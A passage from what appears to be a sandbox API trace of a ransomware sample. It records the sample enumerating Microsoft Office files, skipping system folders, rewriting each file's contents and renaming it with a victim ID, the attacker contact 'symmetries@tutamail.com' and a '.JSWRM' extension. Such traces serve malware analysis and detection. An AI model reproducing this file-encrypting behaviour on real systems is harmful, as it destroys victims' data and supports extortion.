hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.621] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xcd60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xcd60, lpOverlapped=0x0) returned 1 [0116.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.622] CloseHandle (hObject=0x238) returned 1 [0116.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0116.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0116.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0116.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0116.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0116.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.622] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHLTS.DAT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchlts.dat"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHLTS.DAT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchlts.dat.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0116.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0116.623] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa369325, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa369325, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa38f59d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd18, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PSRCHPHN.DAT", cAlternateFileName="")) returned 1 [0116.623] lstrcmpiW (lpString1="PSRCHPHN.DAT", lpString2=".") returned 1 [0116.623] lstrcmpiW (lpString1="PSRCHPHN.DAT", lpString2="..") returned 1 [0116.623] lstrcmpiW (lpString1="PSRCHPHN.DAT", lpString2="...") returned 1 [0116.623] lstrcmpiW (lpString1="PSRCHPHN.DAT", lpString2="windows") returned -1 [0116.623] lstrcmpiW (lpString1="PSRCHPHN.DAT", lpString2="recovery") returned -1 [0116.623] lstrcmpiW (lpString1="PSRCHPHN.DAT", lpString2="perflogs") returned 1 [0116.623] lstrcmpiW (lpString1="PSRCHPHN.DAT", lpString2="documents and settings") returned 1 [0116.623] lstrcmpiW (lpString1="PSRCHPHN.DAT", lpString2="$RECYCLE.BIN") returned 1 [0116.624] lstrcmpiW (lpString1="PSRCHPHN.DAT", lpString2="system volume information") returned -1 [0116.624] lstrcmpiW (lpString1="PSRCHPHN.DAT", lpString2="msocache") returned 1 [0116.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0116.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHPHN.DAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHPHN.DAT", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSRCHPHN.DAT", lpUsedDefaultChar=0x0) returned 12 [0116.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0116.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0116.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHPHN.DAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHPHN.DAT", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSRCHPHN.DAT", lpUsedDefaultChar=0x0) returned 12 [0116.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0116.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0116.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0116.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0116.624] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHPHN.DAT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchphn.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.625] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3352) returned 1 [0116.625] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd10) returned 0x206858 [0116.625] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd10, lpOverlapped=0x0) returned 1 [0116.626] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.626] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd10, lpOverlapped=0x0) returned 1 [0116.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0116.627] CloseHandle (hObject=0x238) returned 1 [0116.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0116.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0116.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0116.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0116.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0116.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.627] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHPHN.DAT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchphn.dat"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHPHN.DAT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchphn.dat.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0116.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0116.628] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa369325, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa369325, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa4c084e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa03a47, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PSRCHSRN.DAT", cAlternateFileName="")) returned 1 [0116.628] lstrcmpiW (lpString1="PSRCHSRN.DAT", lpString2=".") returned 1 [0116.628] lstrcmpiW (lpString1="PSRCHSRN.DAT", lpString2="..") returned 1 [0116.628] lstrcmpiW (lpString1="PSRCHSRN.DAT", lpString2="...") returned 1 [0116.628] lstrcmpiW (lpString1="PSRCHSRN.DAT", lpString2="windows") returned -1 [0116.628] lstrcmpiW (lpString1="PSRCHSRN.DAT", lpString2="recovery") returned -1 [0116.628] lstrcmpiW (lpString1="PSRCHSRN.DAT", lpString2="perflogs") returned 1 [0116.628] lstrcmpiW (lpString1="PSRCHSRN.DAT", lpString2="documents and settings") returned 1 [0116.628] lstrcmpiW (lpString1="PSRCHSRN.DAT", lpString2="$RECYCLE.BIN") returned 1 [0116.628] lstrcmpiW (lpString1="PSRCHSRN.DAT", lpString2="system volume information") returned -1 [0116.628] lstrcmpiW (lpString1="PSRCHSRN.DAT", lpString2="msocache") returned 1 [0116.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0116.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHSRN.DAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHSRN.DAT", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSRCHSRN.DAT", lpUsedDefaultChar=0x0) returned 12 [0116.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0116.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0116.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHSRN.DAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSRCHSRN.DAT", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSRCHSRN.DAT", lpUsedDefaultChar=0x0) returned 12 [0116.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0116.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0116.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0116.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0116.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHSRN.DAT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchsrn.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.629] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10500679) returned 1 [0116.629] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0116.630] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0116.647] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.647] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0116.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.648] CloseHandle (hObject=0x238) returned 1 [0116.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0116.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0116.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0116.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0116.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0116.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.648] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHSRN.DAT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchsrn.dat"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PSRCHSRN.DAT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\psrchsrn.dat.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0116.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0116.657] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc774d49, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc774d49, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xde1fc09e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5b3048, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PUB6INTL.DLL", cAlternateFileName="")) returned 1 [0116.658] lstrcmpiW (lpString1="PUB6INTL.DLL", lpString2=".") returned 1 [0116.658] lstrcmpiW (lpString1="PUB6INTL.DLL", lpString2="..") returned 1 [0116.658] lstrcmpiW (lpString1="PUB6INTL.DLL", lpString2="...") returned 1 [0116.658] lstrcmpiW (lpString1="PUB6INTL.DLL", lpString2="windows") returned -1 [0116.658] lstrcmpiW (lpString1="PUB6INTL.DLL", lpString2="recovery") returned -1 [0116.658] lstrcmpiW (lpString1="PUB6INTL.DLL", lpString2="perflogs") returned 1 [0116.658] lstrcmpiW (lpString1="PUB6INTL.DLL", lpString2="documents and settings") returned 1 [0116.658] lstrcmpiW (lpString1="PUB6INTL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0116.658] lstrcmpiW (lpString1="PUB6INTL.DLL", lpString2="system volume information") returned -1 [0116.658] lstrcmpiW (lpString1="PUB6INTL.DLL", lpString2="msocache") returned 1 [0116.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0116.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUB6INTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0116.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0116.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0116.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUB6INTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0116.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0116.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0116.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0116.658] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcdc2b493, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcdc2b493, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcdc2b493, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PUBCOLOR.SCM", cAlternateFileName="")) returned 1 [0116.658] lstrcmpiW (lpString1="PUBCOLOR.SCM", lpString2=".") returned 1 [0116.658] lstrcmpiW (lpString1="PUBCOLOR.SCM", lpString2="..") returned 1 [0116.658] lstrcmpiW (lpString1="PUBCOLOR.SCM", lpString2="...") returned 1 [0116.658] lstrcmpiW (lpString1="PUBCOLOR.SCM", lpString2="windows") returned -1 [0116.658] lstrcmpiW (lpString1="PUBCOLOR.SCM", lpString2="recovery") returned -1 [0116.658] lstrcmpiW (lpString1="PUBCOLOR.SCM", lpString2="perflogs") returned 1 [0116.658] lstrcmpiW (lpString1="PUBCOLOR.SCM", lpString2="documents and settings") returned 1 [0116.658] lstrcmpiW (lpString1="PUBCOLOR.SCM", lpString2="$RECYCLE.BIN") returned 1 [0116.658] lstrcmpiW (lpString1="PUBCOLOR.SCM", lpString2="system volume information") returned -1 [0116.658] lstrcmpiW (lpString1="PUBCOLOR.SCM", lpString2="msocache") returned 1 [0116.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0116.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBCOLOR.SCM", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBCOLOR.SCM", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBCOLOR.SCM", lpUsedDefaultChar=0x0) returned 12 [0116.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0116.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0116.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBCOLOR.SCM", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBCOLOR.SCM", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBCOLOR.SCM", lpUsedDefaultChar=0x0) returned 12 [0116.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0116.659] 